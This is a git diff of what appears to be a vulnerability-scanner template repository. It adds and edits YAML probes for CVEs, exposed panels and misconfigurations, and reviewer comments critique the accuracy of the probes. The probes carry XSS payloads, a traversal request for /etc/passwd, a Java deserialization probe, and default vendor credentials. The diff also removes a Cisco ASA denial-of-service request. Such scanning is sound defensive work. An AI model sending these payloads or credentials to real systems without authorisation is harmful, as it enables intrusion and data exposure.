diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index a463dd395a..2040891432 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -1,4 +1,4 @@ -name: syntax-checking +name: ❄️ YAML Lint on: [push, pull_request] diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index c1b7800b18..dccc5d3db2 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -1,4 +1,4 @@ -name: "Auto Update README" +name: 📝 Readme Update on: push: diff --git a/README.md b/README.md index b5047d0c3d..d2c2ebfc27 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 309 | vulnerabilities | 152 | exposed-panels | 126 | -| takeovers | 67 | exposures | 96 | technologies | 66 | -| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | -| default-logins | 24 | exposed-tokens | 0 | dns | 8 | -| fuzzing | 8 | helpers | 8 | iot | 11 | +| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 | +| takeovers | 67 | exposures | 99 | technologies | 67 | +| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 | +| default-logins | 26 | exposed-tokens | 0 | dns | 8 | +| fuzzing | 9 | helpers | 8 | iot | 11 | -**103 directories, 1068 files**. +**105 directories, 1085 files**. diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 056bd4e4e7..319fbfefc2 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml 
@@ -7,7 +7,7 @@ info: description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 - tags: phpmyadmin,rce,deserialization + tags: cve,cve2009,phpmyadmin,rce,deserialization requests: - raw: diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index a7ada141e5..49fa9754af 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -10,6 +10,7 @@ info: - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak + tags: cve,cve2015,jetty requests: - method: POST diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml new file mode 100755 index 0000000000..dbce8a980b --- /dev/null +++ b/cves/2017/CVE-2017-12149.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2017-12149 + +info: + name: Java/Jboss Deserialization [RCE] + author: fopina + severity: critical + description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 + - https://chowdera.com/2020/12/20201229190934023w.html + - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 + tags: cve,cve2017,java,rce,deserialization + +requests: + - raw: + - | + POST /invoker/JMXInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + - | + POST /invoker/EJBInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + + matchers-condition: and + matchers: + - type: word + words: + - "ClassCastException" + part: body + + - type: word + words: + - "application/x-java-serialized-object" + part: header \ No newline at end of file diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 531554071a..72e59465d5 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml 
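Review bot: The two raw requests target `/invoker/JMXInvokerServlet/` and `/invoker/EJBInvokerServlet/`, while the description attributes CVE-2017-12149 to the `ReadOnlyAccessFilter` of the HTTP Invoker, which is a different entry point (the vulhub reference, if it still documents it, exercises the readonly invoker path); a host patched for this CVE but still exposing the other invoker servlets would match, and a host exposing only the readonly filter would not. Either add a third raw request against the readonly invoker endpoint, or rename/describe the template as generic JBoss invoker deserialization so a hit is not reported as this specific CVE. The base64 payload decodes to a plain `java.util.ArrayList` with two string elements, which is a good non-destructive probe and deserves a comment above the first request, e.g. `# harmless serialized java.util.ArrayList; a ClassCastException in the reply proves the servlet deserialized it`. The file is also added with mode 100755; a YAML template does not need the executable bit.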
@@ -1,25 +1,31 @@ id: CVE-2017-7269 info: - name: CVE-2017-7269 - author: thomas_from_offensity + name: Windows Server 2003 & IIS 6.0 RCE + author: thomas_from_offensity & @geeknik severity: critical - description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2 - reference: https://github.com/danigargu/explodingcan/blob/master/explodingcan.py + description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL @@ -27,4 +33,4 @@ requests: - regex(".*?PROPFIND", public) # lowercase header name: Public - regex(".*?PROPFIND", allow) # lowercase header name: Allow condition: or - part: header \ No newline at end of file + part: header diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index fbcb628093..7a95222da5 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -9,7 +9,7 @@ info: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf + tags: cve,cve2017,atlassian,jira,ssrf,oob requests: - raw: diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml deleted file mode 100644 index f92d64a488..0000000000 --- a/cves/2018/CVE-2018-0101.yaml +++ /dev/null 
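Review bot: The matchers at the end of this hunk (`regex(".*?PROPFIND", dasl|public|allow)` joined by `condition: or`) only establish that WebDAV advertises PROPFIND, so a hit means the IIS 6.0 WebDAV surface is reachable, not that the `ScStoragePathFromUrl` overflow was triggered, yet the new name and `severity: critical` read as confirmed RCE. Unless the part of this hunk that is not legible in this view adds a `Server: Microsoft-IIS/6.0` check, a one-line caveat is warranted, e.g. after `description:` add `# Fingerprint only: checks that WebDAV/PROPFIND is enabled on IIS 6.0; no overflow is attempted`. The trailing `part: header` fix (adding the missing newline) is fine.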
@@ -1,62 +0,0 @@ -id: CVE-2018-0101 - -info: - name: Cisco ASA Denial-of-Service # Leads to RCE - author: dwisiswant0 - severity: critical - reference: https://www.exploit-db.com/exploits/43986 - description: | - A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, - remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that - the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. - tags: cve,cve2018,cisco,dos,rce - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded - X-Aggregate-Auth: 1 - X-Transcend-Version: 1 - Accept-Encoding: identity - X-AnyConnect-Platform: linux-64 - X-Support-HTTP-Auth: false - X-Pad: 0000000000000000000000000000000000000000 - - - - A - - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200" - - - type: dsl - dsl: - - "status_code_2 == 500" - - "status_code_2 == 501" - - "status_code_2 == 502" - - "status_code_2 == 503" - - "status_code_2 == 504" - condition: or - - - type: dsl - dsl: - - "status_code_3 == 200" - negative: true \ No newline at end of file diff --git a/cves/2018/CVE-2018-8770.yaml b/cves/2018/CVE-2018-8770.yaml index a60457e799..b88211afef 100644 --- a/cves/2018/CVE-2018-8770.yaml +++ b/cves/2018/CVE-2018-8770.yaml @@ -7,7 +7,7 @@ info: reference: | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - https://www.exploit-db.com/exploits/44495/ - tags: cobub,razor,exposure + tags: cve,cve2018,cobub,razor,exposure requests: - method: GET diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 8fd852fb23..d4a879970e 100644 --- a/cves/2019/CVE-2019-17538.yaml 
+++ b/cves/2019/CVE-2019-17538.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: high reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,lfi + tags: cve.cve2019,jnoj,lfi requests: - raw: diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index 14b28fbee8..2590d89ea4 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -4,6 +4,7 @@ info: name: Apache Cocoon 2.1.12 XML Injection author: pikpikcu severity: high + tags: cve,cve2020,apache,xml,cocoon description: | When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index f3ebc5fbfd..93175bfeeb 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -18,7 +18,7 @@ requests: - type: word words: - - "{alert(document.domain);}" + - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" part: body - type: word diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 38aa204b52..21b2119cba 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E' matchers-condition: and matchers: @@ -26,5 +26,5 @@ requests: - type: word words: - - '">' + - "'>\"" part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index e0d8d30bd8..2b3e57a5d7 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml 
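Review bot: The corrected key still carries a wrong separator in its value: `tags: cve.cve2019,jnoj,lfi` yields a single tag `cve.cve2019`, so this template is excluded from both `-tags cve` and `-tags cve2019` runs, which is exactly what the other tag fixes in this commit are trying to make consistent. Change the line to `tags: cve,cve2019,jnoj,lfi`.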
@@ -26,4 +26,4 @@ requests: part: body group: 1 regex: - - "

PHP Version ([0-9.]+)<\/h1>" + - '

PHP Version ([0-9.]+)<\/h1>' diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index 239c53efee..eb7d3e6d13 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -6,7 +6,7 @@ info: severity: medium description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 - tags: rockethchat + tags: cve,cve2020,rockethchat requests: - raw: diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index ad147b8a20..753c1c727b 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" + - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" matchers-condition: and matchers: @@ -25,3 +25,7 @@ requests: words: - '1' part: body + + - type: status + status: + - 200 diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f3e95767f7..f040fb2e36 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 - tags: cve,cve2020,smtp,opensmtpd,network,rce + tags: cve,cve2020,smtp,opensmtpd,network,rce,oob network: - inputs: diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml new file mode 100644 index 0000000000..dfd14878a0 --- /dev/null +++ b/cves/2021/CVE-2021-27651.yaml 
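Review bot: The new tag line keeps the misspelling `rockethchat` (`tags: cve,cve2020,rockethchat`), so a user filtering on the product name from the description (Rocket.Chat) will not select this template; since the line is being rewritten anyway, make it `tags: cve,cve2020,rocketchat`.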
@@ -0,0 +1,41 @@ +id: CVE-2021-27651 + +info: + name: Pega Infinity Authentication bypass + author: idealphase + description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. + reference: | + - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 + severity: critical + tags: cve,cve2021,pega,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/prweb/PRAuth/app/default/" + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Pega Infinity" + part: body + + - type: regex + regex: + - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])' + part: body + + extractors: + - type: regex + regex: + - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])' + part: body \ No newline at end of file diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml new file mode 100644 index 0000000000..0e40527eea --- /dev/null +++ b/cves/2021/CVE-2021-31537.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-31537 + +info: + name: SIS-REWE GO version 7.5.0/12C XSS + author: geeknik + description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ + severity: medium + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "SIS-REWE" + condition: and + + - type: word + part: header + words: + - "text/html" 
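Review bot: The version regex `Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])` has no trailing boundary, so banners such as `Pega 8.5.10` or `Pega 8.2.10` also match by prefix; append a lookahead, `'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])(?![0-9])'`, in both the matcher and the extractor. Because the identical expression appears twice, a comment such as `# keep in sync with the extractor regex below` on the matcher helps the next editor. Note also that nothing here touches the password-reset flow described in `description`; the critical finding is inferred from the version string alone, which the description should state so consumers treat it as a version-based result.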
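Review bot: In the CVE-2021-31537 body matcher the first word renders here as an empty string (`- ""`), and an empty word matches every response, which with `condition: and` leaves `SIS-REWE` as the only effective check; if the `<script>confirm({{randstr}})</script>` token was stripped in rendering, disregard this, otherwise restore it. If the reflected token is meant to be checked, it must use the same `{{randstr}}` placeholder as the request rather than a literal, since the value is generated per run.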
diff --git a/cves/2021/CVE-2021-31800.yaml b/cves/2021/CVE-2021-31800.yaml
new file mode 100644
index 0000000000..fa081899ba
--- /dev/null
+++ b/cves/2021/CVE-2021-31800.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-31800
+
+info:
+ name: Impacket directory traversal
+ author: geeknik
+ description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
+ reference: https://github.com/SecureAuthCorp/impacket/pull/1066
+ severity: high
+ tags: impacket,cve,cve2021,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-password.yaml
new file mode 100644
index 0000000000..1aff766c6b
--- /dev/null
+++ b/default-logins/panabit/panabit-default-password.yaml
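Review bot: The request is an HTTP `GET {{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`, but the description and the referenced pull request concern `smbserver.py`, which "an attacker that connects to a running smbserver instance" reaches over SMB; an HTTP probe cannot exercise that code path, so this is a generic dot-dot traversal check carrying a CVE id it does not test. Either implement it as a `network:` template that speaks SMB, or drop the CVE id and `cve,cve2021` tags and file it as a generic traversal template so a hit is not reported as CVE-2021-31800. If it is kept as an approximation, say so above `requests:`, e.g. `# NOTE: HTTP approximation only; CVE-2021-31800 is an SMB-side bug in Impacket's smbserver.py and is not exercised here`.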
@@ -0,0 +1,45 @@ +id: panabit-gateway-defalut-password + +info: + name: Panabit Default Password + author: pikpikcu + severity: high + reference: https://max.book118.com/html/2017/0623/117514590.shtm + tags: panabit,default-login + +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Length: 246 + Origin: {{BaseURL}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 + Referer: {{BaseURL}}/login/login.htm + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + ------WebKitFormBoundaryAjZMsILtbrBp8VbC + Content-Disposition: form-data; name="username" + + admin + ------WebKitFormBoundaryAjZMsILtbrBp8VbC + Content-Disposition: form-data; name="password" + + panabit + ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'urn:schemas-microsoft-com:vml' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/showdoc/showdoc-default-password.yaml b/default-logins/showdoc/showdoc-default-password.yaml new file mode 100644 index 0000000000..f992f0dac8 --- /dev/null +++ b/default-logins/showdoc/showdoc-default-password.yaml @@ -0,0 +1,31 @@ +id: showdoc-default-password + +info: + name: Showdoc Default Password + author: pikpikcu + severity: medium + reference: | + - https://blog.star7th.com/2016/05/2007.html + tags: showdoc,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/server/index.php?s=/api/user/login" + body: | + username=showdoc&password=123456&v_code= + + headers: + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + matchers-condition: and + matchers: + + - type: word + words: + - '"username":"showdoc"' + - '"user_token":' + condition: and + + - type: status + status: + - 200 
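Review bot: The `id` is `panabit-gateway-defalut-password` (typo `defalut`) and does not match the filename `panabit-default-password.yaml`, unlike the other new templates in this commit; ids are what users pass to `-id` and exclusion lists, so settle on `id: panabit-default-password` before it is relied on. The raw request also hard-codes `Content-Length: 246` for a multipart body; if that figure does not equal the exact byte count of the body (I have not verified it), the target will truncate or hang waiting for bytes, so drop the header and let the engine compute it. The success word `urn:schemas-microsoft-com:vml` is a generic VML namespace that can appear on unauthenticated pages as well, so it is weak evidence of a successful login and deserves a comment saying why it was chosen.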
diff --git a/exposed-panels/microsoft-exchange-control-panel.yaml b/exposed-panels/microsoft-exchange-control-panel.yaml new file mode 100644 index 0000000000..5aa1d49d68 --- /dev/null +++ b/exposed-panels/microsoft-exchange-control-panel.yaml @@ -0,0 +1,24 @@ +id: microsoft-exchange-control-panel + +info: + name: Microsoft Exchange Control Panel + author: r3dg33k + severity: info + description: Publicly accessible Microsoft Exchange Server Control Panel + tags: microsoft,panel + reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html + +requests: + - method: GET + path: + - "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Exchange Admin Center' \ No newline at end of file diff --git a/exposed-panels/tomcat-manager-pathnormalization.yaml b/exposed-panels/tomcat-manager-pathnormalization.yaml index f01b6b09cf..b0300beed9 100644 --- a/exposed-panels/tomcat-manager-pathnormalization.yaml +++ b/exposed-panels/tomcat-manager-pathnormalization.yaml @@ -1,4 +1,5 @@ id: tomcat-manager-pathnormalization + info: name: Tomcat Manager Path Normalization author: organiccrap @@ -11,11 +12,17 @@ requests: path: - '{{BaseURL}}/..;/manager/html' - '{{BaseURL}}/..;/host-manager/html' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + + matchers-condition: and matchers: - type: word words: - - username="tomcat" password="s3cret" - - manager-gui + - 'username="tomcat" password="s3cret"' + - 'manager-gui' condition: and + + - type: status + status: + - 403 + - 401 + negative: true diff --git a/exposures/backups/php-backup-files.yaml b/exposures/backups/php-backup-files.yaml new file mode 100644 index 0000000000..5a9b791a05 --- /dev/null +++ b/exposures/backups/php-backup-files.yaml 
@@ -0,0 +1,54 @@ +id: php-backup-files + +info: + name: PHP source disclosure through backup files + author: StreetOfHackerR007 (Rohit Soni) + severity: medium + tags: exposure,backup,php + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php.bak" + - "{{BaseURL}}/default.php.bak" + - "{{BaseURL}}/main.php.bak" + - "{{BaseURL}}/config.php.bak" + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/header.php.bak" + - "{{BaseURL}}/footer.php.bak" + - "{{BaseURL}}/login.php.bak" + - "{{BaseURL}}/database.php.bak" + - "{{BaseURL}}/db.php.bak" + - "{{BaseURL}}/conn.php.bak" + - "{{BaseURL}}/db_config.php.bak" + - "{{BaseURL}}/404.php.bak" + - "{{BaseURL}}/wp-config.php.bak" + - "{{BaseURL}}/wp-login.php.bak" + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/plain" + - "bytes" + part: header + condition: or \ No newline at end of file diff --git a/exposures/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml index ceca05ecec..a61a9e8069 100644 --- a/exposures/configs/git-config-nginxoffbyslash.yaml +++ b/exposures/configs/git-config-nginxoffbyslash.yaml @@ -5,7 +5,9 @@ info: severity: medium description: Nginx off-by-slash vulnerability exposes Git configuration. tags: config,exposure - reference: https://twitter.com/Random_Robbie/status/1262676628167110656 + reference: | + - https://twitter.com/Random_Robbie/status/1262676628167110656 + - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py requests: - method: GET diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 3611ef1763..b67f6b3be1 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml 
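Review bot: In the header matcher the word `bytes` matches `Accept-Ranges: bytes`, which most static-file responses carry, so with `condition: or` that matcher is effectively always true and adds no discrimination; match on `application/octet-stream` or `text/x-php` instead, or drop the header matcher and rely on the body token together with the 200 status. With `redirects: true` and `max-redirects: 1` a catch-all redirect to a landing page is also followed, so the body token (shown here as an empty `""`, presumably a stripped `<?php`) is the only thing preventing false positives; a short comment on that assumption would help.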
@@ -17,7 +17,6 @@ requests: - "{{BaseURL}}/.env.prod.local" - "{{BaseURL}}/.env.production.local" - "{{BaseURL}}/.env.local" - - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" matchers-condition: and diff --git a/exposures/configs/ruijie-phpinfo.yaml b/exposures/configs/ruijie-phpinfo.yaml new file mode 100644 index 0000000000..b57e02ab73 --- /dev/null +++ b/exposures/configs/ruijie-phpinfo.yaml @@ -0,0 +1,25 @@ +id: ruijie-phpinfo + +info: + name: Ruijie Phpinfo + author: pikpikcu + severity: low + reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + tags: phpinfo,rujjie,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/view/phpinfo.view.php" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Version" + - "PHP Extension" + condition: and + + - type: status + status: + - 200 diff --git a/fuzzing/xff-403-bypass.yaml b/fuzzing/xff-403-bypass.yaml new file mode 100644 index 0000000000..694ada23cb --- /dev/null +++ b/fuzzing/xff-403-bypass.yaml 
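Review bot: The tag line of the new Ruijie template misspells the vendor, `tags: phpinfo,rujjie,config,exposure`, so filtering by the product name used in `name: Ruijie Phpinfo` will miss it; change it to `tags: phpinfo,ruijie,config,exposure`.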
@@ -0,0 +1,47 @@
+id: xff-403-bypass
+
+info:
+ name: X-Forwarded-For 403-forbidden bypass
+ author: vavkamil
+ severity: info
+ description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
+ tags: xff,bypass,fuzz
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+ Connection: close
+ Accept: */*
+ Accept-Language: en
+ Accept-Encoding: gzip
+
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+ Connection: close
+ Accept: */*
+ Accept-Language: en
+ Accept-Encoding: gzip
+ X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
+
+ - |
+ GET /test.txt HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
+ Connection: close
+ Accept: */*
+ Accept-Language: en
+ Accept-Encoding: gzip
+ X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 403 && status_code_2 != 403"
+ - "status_code_1 == 403 && status_code_3 != 403"
+ condition: or
\ No newline at end of file
diff --git a/misconfiguration/apache-filename-brute-force.yaml b/misconfiguration/apache-filename-brute-force.yaml
new file mode 100644
index 0000000000..61863aac5d
--- /dev/null
+++ b/misconfiguration/apache-filename-brute-force.yaml
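Review bot: The second DSL clause, `status_code_1 == 403 && status_code_3 != 403`, compares the root path `/` from request 1 with `/test.txt` from request 3, so a host that returns 403 on `/` and 404 on a nonexistent `/test.txt` is reported as a header bypass regardless of X-Forwarded-For. Each probe needs its own baseline without the header; add a plain `GET /test.txt` before the X-Forwarded-For variant and compare those two status codes, as sketched below (the existing `/test.txt` request then becomes request 4). `Accept-Encoding: gzip` is harmless since only status codes are compared, but it can be dropped to keep the requests minimal.

```yaml
# … unchanged: requests 1 and 2 (GET / without and with X-Forwarded-For) …
      - |
        GET /test.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
        Connection: close
        Accept: */*
        Accept-Language: en

# … unchanged: request 4 = the existing GET /test.txt with X-Forwarded-For …
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 403 && status_code_2 != 403"
          - "status_code_3 == 403 && status_code_4 != 403"
        condition: or
```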
